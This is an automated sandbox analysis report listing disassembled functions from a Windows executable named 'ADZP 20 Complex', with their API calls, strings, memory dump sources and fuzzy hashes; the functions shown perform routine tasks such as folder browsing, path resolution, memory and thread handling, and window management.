                    Uniqueness Score: -1.00%

                    Function 00409355 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 116libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 00409373
                      • Part of subcall function 0040EA90: TlsGetValue.KERNEL32(0000000D,\\?\,?,004096ED,00000104,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040EA9A
                    • memset.MSVCRT ref: 00409381
                    • LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                    • GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                    • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                    • wcsncpy.MSVCRT ref: 004093DD
                    • wcslen.MSVCRT ref: 004093F1
                    • CoTaskMemFree.OLE32(?), ref: 0040947A
                    • wcslen.MSVCRT ref: 00409481
                    • FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
                    • String ID: $0A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                    • API String ID: 4193992262-92458654
                    • Opcode ID: 4992d49dd3de5c3f1859f7f66b903f930d521af3df3d93c459ab95a70e3c859f
                    • Instruction ID: dd14e0d5c7aaf6d086be5bb491997024bece532a8fadf3e5f1c49f9ab44bf52d
                    • Opcode Fuzzy Hash: 4992d49dd3de5c3f1859f7f66b903f930d521af3df3d93c459ab95a70e3c859f
                    • Instruction Fuzzy Hash: 43414471508304AAC720EF759C49A9FBBE8EF88714F004C3FF945E3292D77899458B5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406310 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 275COMMON
                    Download Yara Rule
                    APIs
                    • wcsncpy.MSVCRT ref: 00406405
                      • Part of subcall function 0040E880: TlsGetValue.KERNEL32(0000000D,?,?,00405EC5,00001000,00001000,?,?,00001000,00402F92,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E88A
                    • _wcsdup.MSVCRT ref: 0040644E
                    • _wcsdup.MSVCRT ref: 00406469
                    • _wcsdup.MSVCRT ref: 0040648C
                    • wcsncpy.MSVCRT ref: 00406578
                    • free.MSVCRT(?), ref: 004065DC
                    • free.MSVCRT(?), ref: 004065EF
                    • free.MSVCRT(?), ref: 00406602
                    • wcsncpy.MSVCRT ref: 0040662E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: _wcsdupfreewcsncpy$Value
                    • String ID: $0A$$0A$$0A
                    • API String ID: 1554701960-360074770
                    • Opcode ID: 50c0b281b621336e4783d2df5908e4d1d9710958fa3a9793cbe9cd8f60bad7d8
                    • Instruction ID: 8dd6decbfdfb2e9f9ed0212bb19f765ed94392260ea2aa670051c2f9137328dc
                    • Opcode Fuzzy Hash: 50c0b281b621336e4783d2df5908e4d1d9710958fa3a9793cbe9cd8f60bad7d8
                    • Instruction Fuzzy Hash: 27A1BD715043019BCB209F18C881A2BB7F1EF94348F49493EFC8667391E77AD965CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040AEBA Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 91libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
                      • Part of subcall function 0040E900: RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E967
                    • LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,0040373D,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040AEE3
                    • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040AEF5
                    • wcscpy.MSVCRT ref: 0040AF1B
                    • wcscat.MSVCRT ref: 0040AF26
                    • wcslen.MSVCRT ref: 0040AF2C
                    • CoTaskMemFree.OLE32(?,00000000,00000000,?,02209F70,00000000,00000000), ref: 0040AF3A
                    • FreeLibrary.KERNEL32(00000000,?,?,?,00000009,0040373D,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746,00000000), ref: 0040AF41
                    • wcscat.MSVCRT ref: 0040AF59
                    • wcslen.MSVCRT ref: 0040AF5F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FreeLibrarywcscatwcslen$AddressAllocateHeapLoadProcTaskValuewcscpy
                    • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                    • API String ID: 1878685483-287042676
                    • Opcode ID: ad09f511d23b933faec5afe470d0aa094d12b013be087039f3c77e99aed8eb9a
                    • Instruction ID: 692465ff5638a5220195cb25a460cc83d5c0d74b8cd54d9d2378aa313f557f39
                    • Opcode Fuzzy Hash: ad09f511d23b933faec5afe470d0aa094d12b013be087039f3c77e99aed8eb9a
                    • Instruction Fuzzy Hash: 59210DB12483037AC121A7629C4AF6B3968DB51B95F10043FF505B51C1DABCC96195AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00412722 Relevance: 19.6, APIs: 13, Instructions: 74memoryregistrythreadCOMMON
                    Download Yara Rule
                    APIs
                    • TlsAlloc.KERNEL32(?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000), ref: 00412732
                    • InitializeCriticalSection.KERNEL32(004186E8,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000), ref: 0041273E
                    • TlsGetValue.KERNEL32(?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000), ref: 00412754
                    • HeapAlloc.KERNEL32(00000008,00000014,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 0041276E
                    • EnterCriticalSection.KERNEL32(004186E8,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000), ref: 0041277F
                    • LeaveCriticalSection.KERNEL32(004186E8,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 0041279B
                    • GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000), ref: 004127B4
                    • GetCurrentThread.KERNEL32 ref: 004127B7
                    • GetCurrentProcess.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127BE
                    • DuplicateHandle.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127C1
                    • RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,0041281A,00000000,000000FF,00000008), ref: 004127D7
                    • TlsSetValue.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127E4
                    • HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                    • String ID:
                    • API String ID: 298514914-0
                    • Opcode ID: 2e736260770be91d420535d1c957e5431970d5774848fb61a6feb3a44565c38a
                    • Instruction ID: 7332ff317071e0a972604479ba3dd7ff9d073507a24f1d64326450f2c9127e0c
                    • Opcode Fuzzy Hash: 2e736260770be91d420535d1c957e5431970d5774848fb61a6feb3a44565c38a
                    • Instruction Fuzzy Hash: 36210770644301BFDB119F60ED88B967FB9FB08761F14C43AF505A62A1CBB49850CB68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403221 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176COMMON
                    Download Yara Rule
                    APIs
                    • GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032AE
                    • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032B7
                    • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 004033D7
                    • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004033E0
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E5BC
                    • PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032E7
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                    • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403414
                    • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040341D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
                    • String ID: sysnative
                    • API String ID: 3406704365-821172135
                    • Opcode ID: ffb34744e6d629d9349e21e7cca883396b6f40e9af2640bea7bdd6565dd5fdd2
                    • Instruction ID: e6855e8cc6b59ba75e59fbb34a632fbdfc5c60153de78cbca022c055a9fde60a
                    • Opcode Fuzzy Hash: ffb34744e6d629d9349e21e7cca883396b6f40e9af2640bea7bdd6565dd5fdd2
                    • Instruction Fuzzy Hash: 83510A75118201BAD600BBB3DC82E3F66A9EB8075CF10CC3EB144751E2EA3DD9655A6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040E0C3 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53librarysleeploaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040DED5,0041867C,0040E062,00000000,FFFFFFED,00000200,76EC5E70,0040A4F6,FFFFFFED,00000010), ref: 0040E0D1
                    • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040E0E6
                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040E101
                    • InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040E110
                    • Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040E122
                    • InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040E135
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
                    • String ID: InitOnceExecuteOnce$Kernel32.dll
                    • API String ID: 2918862794-1339284965
                    • Opcode ID: 5ce0d2485c1bb4decbbcb922162a80cd5c7d15fe9eeb9708d5254b12b909fa63
                    • Instruction ID: f1debd77009d833240bff916e076c3bff8506a5db62120b34ae0b3aef6ef2b9b
                    • Opcode Fuzzy Hash: 5ce0d2485c1bb4decbbcb922162a80cd5c7d15fe9eeb9708d5254b12b909fa63
                    • Instruction Fuzzy Hash: 3001D431244214FBD6201FA2DC4DFEB7B79EB45B52F10883AF501B51C0EAB85D21C66D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409507 Relevance: 12.0, APIs: 8, Instructions: 50threadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00409511
                    • GetCurrentThreadId.KERNEL32 ref: 0040951F
                    • IsWindowVisible.USER32(?), ref: 00409526
                      • Part of subcall function 0040E1F2: HeapAlloc.KERNEL32(00000008,00000000,0040DA6C,00418670,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040E1FE
                    • GetCurrentThreadId.KERNEL32 ref: 00409543
                    • GetWindowLongW.USER32(?,000000EC), ref: 00409550
                    • GetForegroundWindow.USER32 ref: 0040955E
                    • IsWindowEnabled.USER32(?), ref: 00409569
                    • EnableWindow.USER32(?,00000000), ref: 00409579
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                    • String ID:
                    • API String ID: 3383493704-0
                    • Opcode ID: 68a633d90a34132dfb5e2fdbc66a21f5e6654eddc9afd13cb677bbd48b54e552
                    • Instruction ID: 39f81579f69f96c849a8792b8e2bccb0372a8aae8c011f207204c0ba92c0e649
                    • Opcode Fuzzy Hash: 68a633d90a34132dfb5e2fdbc66a21f5e6654eddc9afd13cb677bbd48b54e552
                    • Instruction Fuzzy Hash: 2E01DD321083016FD3219B7ADC88AABBBF8AF51760B04803EF446D3291D7748C40C66D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408EB4 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(?), ref: 00408EED
                    • GetWindowLongW.USER32(?,000000EB), ref: 00408EFC
                    • GetWindowTextLengthW.USER32 ref: 00408F0A
                    • HeapAlloc.KERNEL32(00000000), ref: 00408F1F
                    • GetWindowTextW.USER32(00000000,00000001), ref: 00408F2F
                    • DestroyWindow.USER32(?), ref: 00408F3D
                    • UnregisterClassW.USER32 ref: 00408F53
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
                    • String ID:
                    • API String ID: 2895088630-0
                    • Opcode ID: 95d800774705508cbc5b0801488b835211eb90fc9c6ab37156a63b4f6fedfd03
                    • Instruction ID: 1940c3daec6268f5e5453f2abd6c11195bb238337c9a47dace4bef07d760dbb1
                    • Opcode Fuzzy Hash: 95d800774705508cbc5b0801488b835211eb90fc9c6ab37156a63b4f6fedfd03
                    • Instruction Fuzzy Hash: 9011FA3110821AFFCB115F64ED4C9E63F76EB18365B10C17AF845A2AB0CF359951EB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409588 Relevance: 9.1, APIs: 6, Instructions: 68threadCOMMON
                    Download Yara Rule
                    APIs
                    • EnumWindows.USER32(00409507,?), ref: 0040959B
                    • GetCurrentThreadId.KERNEL32 ref: 004095B3
                    • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095CF
                    • GetCurrentThreadId.KERNEL32 ref: 004095EF
                    • EnableWindow.USER32(?,00000001), ref: 00409605
                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040961C
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Window$CurrentThread$EnableEnumWindows
                    • String ID:
                    • API String ID: 2527101397-0
                    • Opcode ID: 63874de7abb22210dce27e7498091370d04ccb8537cec92ca55daa4cf010ce04
                    • Instruction ID: 1b506e7c949c81e82e84a7d7bfb29e48a0d3001387cd43cbe5fa1ceb5ac7c4b4
                    • Opcode Fuzzy Hash: 63874de7abb22210dce27e7498091370d04ccb8537cec92ca55daa4cf010ce04
                    • Instruction Fuzzy Hash: D211D032149741BBD7324F16EC48F57BBB9EB81B20F148A3EF065226E1DB766C44CA18
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040D9D3 Relevance: 9.1, APIs: 6, Instructions: 66memoryCOMMON
                    Download Yara Rule
                    APIs
                    • TlsAlloc.KERNEL32(?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D9F8
                    • HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA0C
                    • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA19
                    • TlsGetValue.KERNEL32(00000010,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA30
                    • HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA3F
                    • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA4E
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocValue$Heap
                    • String ID:
                    • API String ID: 2472784365-0
                    • Opcode ID: 7f6b70932fc1a08cda45a5a13933a08f33854a1b42fa358b63a86d14e57a1294
                    • Instruction ID: 2e0cfeba47cec0f6b91efb2e93d625c98a83c07df354da5318bce0fb1280086a
                    • Opcode Fuzzy Hash: 7f6b70932fc1a08cda45a5a13933a08f33854a1b42fa358b63a86d14e57a1294
                    • Instruction Fuzzy Hash: 1C118676A45310AFD7109FA5EC44AA67FA9EB18760B05813EF904D7370DA359C44CBAC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004126A4 Relevance: 9.0, APIs: 6, Instructions: 45memoryCOMMON
                    Download Yara Rule
                    APIs
                    • UnregisterWait.KERNEL32(?), ref: 004126AE
                    • CloseHandle.KERNEL32(?,?,?,?,0041282A,?), ref: 004126B7
                    • EnterCriticalSection.KERNEL32(004186E8,?,?,?,0041282A,?), ref: 004126C3
                    • LeaveCriticalSection.KERNEL32(004186E8,?,?,?,0041282A,?), ref: 004126E8
                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,0041282A,?), ref: 00412706
                    • HeapFree.KERNEL32(?,?,?,?,?,0041282A,?), ref: 00412718
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
                    • String ID:
                    • API String ID: 4204870694-0
                    • Opcode ID: f70a7c029a070c226780d23f7e43a7120967b39c5434bc4d35a475d06415ef98
                    • Instruction ID: 8ad69fc92b526a08bfe7472bb61da84b570d2b31100e81d3d28f3db860eb322d
                    • Opcode Fuzzy Hash: f70a7c029a070c226780d23f7e43a7120967b39c5434bc4d35a475d06415ef98
                    • Instruction Fuzzy Hash: ED014874202605BFC7159F11ED88ADABB79FF49352310843EE51AC6A60CB35A861CBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004057F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118COMMON
                    Download Yara Rule
                    APIs
                    • wcsncmp.MSVCRT(00000000,?,?,?,?,-0000012C,?,?,00402252,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00405853
                    • memmove.MSVCRT ref: 004058E1
                    • wcsncpy.MSVCRT ref: 004058F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: memmovewcsncmpwcsncpy
                    • String ID: $0A$$0A
                    • API String ID: 1452150355-167650565
                    • Opcode ID: b06504f386dc6b7509aa377d402f9f39eb11f5effc5dd8443b7921d35adbde65
                    • Instruction ID: 832c062924e7bef47b33d77ba9c88e4f4304e1b7f9fac3bbf8cf3561daacd64f
                    • Opcode Fuzzy Hash: b06504f386dc6b7509aa377d402f9f39eb11f5effc5dd8443b7921d35adbde65
                    • Instruction Fuzzy Hash: 7131C336904B058BC720BA55888057B77A8EE84384F14893EEC8537382EB799D61CBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040552C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040553B
                    • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040554A
                    • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040555A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcmemset
                    • String ID: RtlGetVersion$ntdll.dll
                    • API String ID: 3137504439-1489217083
                    • Opcode ID: 979e6798394419a5d8feb081e21a74f9c3e25225fd5f8554349b136b21278e81
                    • Instruction ID: c27d50cfc24873b946f5b5a14a9105dc5d991450749eb0f504377b4d26b5710e
                    • Opcode Fuzzy Hash: 979e6798394419a5d8feb081e21a74f9c3e25225fd5f8554349b136b21278e81
                    • Instruction Fuzzy Hash: 14E0DF31B8461576C6202F75AC0AFCB2AEDCFC6B41B18043AF101F31D5DA38CA418ABD
                    Uniqueness

                    Uniqueness Score: -1.00%

